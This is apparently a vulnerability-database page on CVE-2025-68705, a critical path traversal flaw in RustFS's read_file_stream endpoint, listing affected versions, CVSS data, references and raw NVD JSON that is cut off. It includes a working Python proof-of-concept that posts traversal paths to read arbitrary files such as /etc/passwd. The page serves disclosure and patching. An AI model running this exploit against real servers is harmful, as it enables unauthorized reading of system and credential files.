CVE-2025-68705

Description

RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 to 1.0.0-alpha.78, RustFS contains a path traversal vulnerability in the /rustfs/rpc/read_file_stream endpoint. This issue has been patched in version 1.0.0-alpha.79.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:rustfs:rustfs:1.0.0:alpha13:*:*:*:rust:*:* - VULNERABLE

cpe:2.3:a:rustfs:rustfs:1.0.0:alpha14:*:*:*:rust:*:* - VULNERABLE

cpe:2.3:a:rustfs:rustfs:1.0.0:alpha15:*:*:*:rust:*:* - VULNERABLE

cpe:2.3:a:rustfs:rustfs:1.0.0:alpha16:*:*:*:rust:*:* - VULNERABLE

cpe:2.3:a:rustfs:rustfs:1.0.0:alpha17:*:*:*:rust:*:* - VULNERABLE

RustFS 1.0.0-alpha.13

RustFS 1.0.0-alpha.14

RustFS 1.0.0-alpha.15

RustFS 1.0.0-alpha.16

RustFS 1.0.0-alpha.17

RustFS 1.0.0-alpha.18

RustFS 1.0.0-alpha.19

RustFS 1.0.0-alpha.20

RustFS 1.0.0-alpha.21

RustFS 1.0.0-alpha.22

RustFS 1.0.0-alpha.23

RustFS 1.0.0-alpha.24

RustFS 1.0.0-alpha.25

RustFS 1.0.0-alpha.26

RustFS 1.0.0-alpha.27

RustFS 1.0.0-alpha.28

RustFS 1.0.0-alpha.29

RustFS 1.0.0-alpha.30

RustFS 1.0.0-alpha.31

RustFS 1.0.0-alpha.32

RustFS 1.0.0-alpha.33

RustFS 1.0.0-alpha.34

RustFS 1.0.0-alpha.35

RustFS 1.0.0-alpha.36

RustFS 1.0.0-alpha.37

RustFS 1.0.0-alpha.38

RustFS 1.0.0-alpha.39

RustFS 1.0.0-alpha.40

RustFS 1.0.0-alpha.41

RustFS 1.0.0-alpha.42

RustFS 1.0.0-alpha.43

RustFS 1.0.0-alpha.44

RustFS 1.0.0-alpha.45

RustFS 1.0.0-alpha.46

RustFS 1.0.0-alpha.47

RustFS 1.0.0-alpha.48

RustFS 1.0.0-alpha.49

RustFS 1.0.0-alpha.50

RustFS 1.0.0-alpha.51

RustFS 1.0.0-alpha.52

RustFS 1.0.0-alpha.53

RustFS 1.0.0-alpha.54

RustFS 1.0.0-alpha.55

RustFS 1.0.0-alpha.56

RustFS 1.0.0-alpha.57

RustFS 1.0.0-alpha.58

RustFS 1.0.0-alpha.59

RustFS 1.0.0-alpha.60

RustFS 1.0.0-alpha.61

RustFS 1.0.0-alpha.62

RustFS 1.0.0-alpha.63

RustFS 1.0.0-alpha.64

RustFS 1.0.0-alpha.65

RustFS 1.0.0-alpha.66

RustFS 1.0.0-alpha.67

RustFS 1.0.0-alpha.68

RustFS 1.0.0-alpha.69

RustFS 1.0.0-alpha.70

RustFS 1.0.0-alpha.71

RustFS 1.0.0-alpha.72

RustFS 1.0.0-alpha.73

RustFS 1.0.0-alpha.74

RustFS 1.0.0-alpha.75

RustFS 1.0.0-alpha.76

RustFS 1.0.0-alpha.77

RustFS 1.0.0-alpha.78

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-68705 Path Traversal PoC
# Target: RustFS /rustfs/rpc/read_file_stream endpoint

def exploit_path_traversal(target_url, file_path):
    """
    Exploit path traversal vulnerability to read arbitrary files
    
    Args:
        target_url: Base URL of the vulnerable RustFS instance
        file_path: Path to the file to read (e.g., ../../../../etc/passwd)
    """
    endpoint = f"{target_url}/rustfs/rpc/read_file_stream"
    
    # Construct malicious payload with path traversal
    payload = {
        "path": file_path,
        "offset": 0,
        "limit": 10240
    }
    
    try:
        print(f"[*] Target: {target_url}")
        print(f"[*] Attempting to read: {file_path}")
        
        response = requests.post(endpoint, json=payload, timeout=30)
        
        if response.status_code == 200:
            print(f"[+] Success! File content retrieved:")
            print(response.text)
            return True
        else:
            print(f"[-] Failed with status code: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve_2025_68705.py <target_url> <file_path>")
        print("Example: python cve_2025_68705.py http://target.com ../../../../etc/passwd")
        sys.exit(1)
    
    target = sys.argv[1]
    file_path = sys.argv[2]
    exploit_path_traversal(target, file_path)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-68705
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-68705
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-68705/
[4] VulDB https://vuldb.com/cve/CVE-2025-68705
[5] https://github.com/rustfs/rustfs/commit/ab752458ce431c6397175d167beee2ea00507d3e
[6] https://github.com/rustfs/rustfs/security/advisories/GHSA-pq29-69jg-9mxc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-68705", "sourceIdentifier": "[email protected]", "published": "2026-01-07T21:15:59.383", "lastModified": "2026-01-16T19:29:47.410", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RustFS is a distributed object storage system built in Rust. In versions 1.0.0-alpha.13 to 1.0.0-alpha.78, RustFS contains a path traversal vulnerability in the /rustfs/rpc/read_file_stream endpoint. This issue has been patched in version 1.0.0-alpha.79."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha13:*:*:*:rust:*:*", "matchCriteriaId": "BD2476D6-257C-4A96-BED4-D8B002402242"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha14:*:*:*:rust:*:*", "matchCriteriaId": "774EC64C-73ED-4D6B-893B-30A066DA934C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha15:*:*:*:rust:*:*", "matchCriteriaId": "4B567F4F-131F-4D4B-8C0C-9212F22F2BB3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha16:*:*:*:rust:*:*", "matchCriteriaId": "711F7641-A2B2-410B-B05D-6656F9A1798F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha17:*:*:*:rust:*:*", "matchCriteriaId": "EB79AC62-2B79-441C-BC09-4C834C32EADA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha18:*:*:*:rust:*:*", "matchCriteriaId": "62DE84EE-9F3B-460A-AC13-D2B8CCBC5B4E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha19:*:*:*:rust:*:*", "matchCriteriaId": "DEF70599-6550-49D2-9800-FE3249A66568"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha20:*:*:*:rust:*:*", "matchCriteriaId": "FDFE93A5-B6D7-482A-A891-4D8844604C07"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha21:*:*:*:rust:*:*", "matchCriteriaId": "79AC4F00-B006-46C2-863F-2946BB02B58E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha22:*:*:*:rust:*:*", "matchCriteriaId": "E313A243-ED56-498D-988F-E088693EBB61"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha23:*:*:*:rust:*:*", "matchCriteriaId": "D3A60CB7-1F01-4A60-8555-C225AC89B959"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha24:*:*:*:rust:*:*", "matchCriteriaId": "1C98618D-CF5D-406B-8AA5-34B412F3D43D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha25:*:*:*:rust:*:*", "matchCriteriaId": "98373960-FEDB-4933-92D5-2A597045DD23"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha26:*:*:*:rust:*:*", "matchCriteriaId": "83E0E1A5-3C07-45FF-80FD-0DB375E1575E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha27:*:*:*:rust:*:*", "matchCriteriaId": "C2D66076-4005-4F58-A8E2-690620 ... (truncated)